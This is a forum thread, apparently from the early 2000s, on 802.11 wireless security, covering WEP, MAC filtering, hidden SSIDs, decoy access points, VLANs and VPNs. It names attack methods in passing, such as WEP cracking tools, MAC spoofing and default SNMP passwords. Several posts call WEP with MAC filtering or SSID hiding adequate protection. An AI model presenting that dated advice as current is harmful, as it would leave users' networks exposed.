How secure do users of 802.11 networks feel? I've gotten past my trepidation about using my credit card on a wired connection, but am not so certain of the wireless side with all the sniffers and drive-by scanning out there. One comment I hear is that corporate users, who are driving much of 802.11 are demanding the industry take security more serious, while home consumers are still in the 'oh, cool' phase and aren't so worried...yet.

Do you feel there is enough security for 802.11 to become more than a business network, but an alternative to the wired Internet?

Ed

Its easy to create very secure wireless network with no need for radius servers & kerberos etc...

You have to apply some methods used in the physical networking world.

Many people do not understand the technology (its quite new technology for many businesses). Actually you have to stand back and look at the problem from a different angle.

I suppose the first step to increased wireless security is using what's already available. During last year's uproar over 802.11b, many companies didn't even go to the trouble of installing the default security. RSA released a patch to the RC4 algorithm and people are saying that's not enough and call for AES, which one U.S. agency opined would take trillions of years to crack -- I'm not sure we need to go that far to protect my Amazon.com order.

First of all, it takes a couple of days to gather enough traffic to then be able to crack WEP with WEPcrack or Airsnort. Knowing this you have to ask yourself if it's worth for the cracker to hang around for that long to get into whatever you have.

Second, if the AP is using MAC filtering, the hacker needs to go back in the log to find a suitable MAC address and then be able to spoof it. I have yet to have someone tell me how to spoof a MAC address on a client card although theoretically it can be done.

Changing the SSID does not provide any security at all since it can be easily read off the air even if the stream is encrypted because it is sent plain text.

Since there are plenty of access points around that don't use any security at all, most hackers would opt for an easier target unless the rewards for cracking the AP greatly exceed the cost of cracking it.

So for the home user, I feel that using WEP and MAC filtering is relatively safe. So what if the cracker breaks into the system? He might get a cache of great jokes that Aunt Sally sent the owner of this house. Maybe the cracker can find a quicken program that has credit card numbers stored in it.

However, in a business or government environment, this is entirely different. To a cracker, two days of work to get into an AP may definitely be worth the effort. In many places, all you have to do is walk in and jack into one of the many ethernet jacks left open all over inside the building. However, access to a business may be controlled by a security guard. A wireless network may let the cracker into the building but let the airwaves do the walking. Businesses should worry most about unsecure rogue access points because they are in a sense holes in the physical security.

A couple of other things to think about: WEP does not have a good key distribution system. This means that changing keys is a very difficult thing to do in a large scale system. If an employee has his laptop stolen, to change the access keys of a medium size company is virtually impossible. WEP keys are often stored in the registry in the clear. Keys can be comprimised by a cracker that borrows an employees laptop and inspects it.

Many times AP's have SNMP access over the wired network. And since admins are often lazy, the passwords are sometimes left at the default or changed to something easy to remember (or guess). If an SNMP access to an AP can be comprimized, reading out the WEP key and adding an extra MAC address to the MAC filter is nearly trivial.

Many times a VLAN solution can be used to secure a system where WEP and Mac Filtering is not enough.

It's all relative.

Konrad Roeder
http://www.springswireless.com

(1)
Not to give the Access Points IP addresses. For a business with 10 Access Points in an office with is not a real problem. So the user needs physical access to hack the Access Point.

This also stops insider hacking. If you are hacked then it stops the hacker attacking Access Points and possibly changing the config to suit their needs.

(2)
Use a random password generator for the WEP key and SSID. I have heard some vendors putting the WEP key for Windows in the registry. We use Agere which put it in the actual card.

(3)
Deploy a decoy Access Point (or many) with no security setup (or maybe a little) to be the easy target for any hacker. These should not be connected to the physical network at all. Or if security is paramount then connected to a SecureBSD machine to look like a corp network and log all attacks and isolate the hack.

The hacking will see it as a challenge and hack without knowing that it is futile. Allows you see (with syslogs and monitoring apps) that you are being targeted. Without one how do you know your wireless network is being targeted by a hacker?

(4)
Install a VLAN capable switch and put the Wireless network on a different network and manage it that way. This is very popular with v.large installations (100+ Access Points). Or installations where they are willing to spend some more money and can see & understand with advantage.

(5)
Use an Access Point that can be configured not to broadcast its network name. So even with WEP off, scanning for a network will not see any Access Points unless the extact network name and/or WEP key installed.

If a hacker cannot see a wireless network (using the 'ANY' SSID) then how do they hack one. Using with option 3 this can be very effective. This will stop the script kiddies and the casual hacker.

For most installs I use options 1,2 & 5 by default and are no cost options.

Molestrangler,
Your list is pretty good. However I have a few comments:

(1) Not to give the Access Points IP addresses. The downside is that to change WEP keys, you need to physically connect a USB cable to each AP. This can become painful in larger deployments.

(2) Use a random password generator for the WEP key and SSID.
I agree WEP keys need to be randomly generated. However SSID's offer no protection whatsoever. SSID's are sent in the clear outside of WEP encryption.

(3) Deploy a decoy Access Point
Great idea. However, when you have multiple access points in a building, you would want them using the same SSID and encryption for roaming. It's better to run a tool like EtherPeek and trap on excessive networking probing.

(4) Put the APs on their own LAN, outside the firewall. Use VPN to secure the connection. The VPN in turn is allowed to use a single port to get past the firewall to the VPN server. This is a sure bet.

The important part with this solution is to find a VPN solution that is only licensed at the server and not at the client. You don't want to have to pay for the client software every time a new employee (or student) is added to the group of users. In an academic setting there is a lot of turn-around of students each semester.

(5) Access Points without broadcasts
This is just a small deterrent. What you do is sniff the packets that an active user is using to log on to the network. The SSID is in the clear.

I would add the following to the list:

(6) use encryption - by all means use WEP if that is all you have. But a VPN solution also adds a strong encryption layer with the cost of some throughput.

(7) use MAC address filtering
Again like #5, this is a small deterrent. To get around it, sniff packets from active users. However, MAC address cloning is really much harder than simply entering an SSID into your client software.

Konrad Roeder
http://www.springswireless.com

(1)
In my experiance when you configure an Access Point and document what has been done then the Access Point does not need any further set-up/Interrogation. I have never really come across many installations where there is a need for constant acces to the installed Access Points.

Where security is paramount this is an option, as well as physical security.

(3)
You would not use the same SSID as the real network. You would use an obvious name like the company name for the decoy so to lure ther hacker too them. The real nework would use Access Points that do not broadcast their SSID.

This would lure the hacker into the decoy Access Point that is not connected to a phyical network with no IP address. You do not want authorised client to roam to the decoy Access Points because they are NOT connected to any physcial network.

(5)
I think that you underestimate this option. If you cannot see a wireless network to hack then how are you to know there is a wireless network too hack. You would need inside information to know there was one to hack.

This will stop most of the casual hacks and script kiddies out there. It is very difficult to run a company and protect yourself from internal hacks.